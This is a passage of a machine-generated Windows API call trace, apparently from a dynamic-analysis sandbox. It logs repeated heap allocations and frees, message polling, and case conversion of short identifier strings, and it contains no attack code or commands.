RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0215.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0215.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0215.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74628 | out: hHeap=0x2af0000) returned 1 [0215.079] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0215.079] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0215.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0215.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0215.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0215.080] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0215.080] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0215.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.080] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0215.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7a0 [0215.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a746b8 [0215.080] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0215.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0215.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0215.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0215.081] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0215.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0215.081] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0215.081] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0215.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0215.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0215.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0215.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.082] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a746b8 | out: hHeap=0x2af0000) returned 1 [0215.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.082] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0215.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0215.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0215.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0215.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0215.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0215.083] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0215.083] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0215.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab9b0 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.083] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0215.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0215.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0215.083] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0215.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0215.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0215.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0215.084] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0215.084] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0215.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0215.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0215.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0215.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0215.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0215.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0215.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0215.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0215.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0215.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0215.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0215.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0215.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0215.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0215.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.089] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0215.089] HeapFree (in: hHeap=0x2af0000, 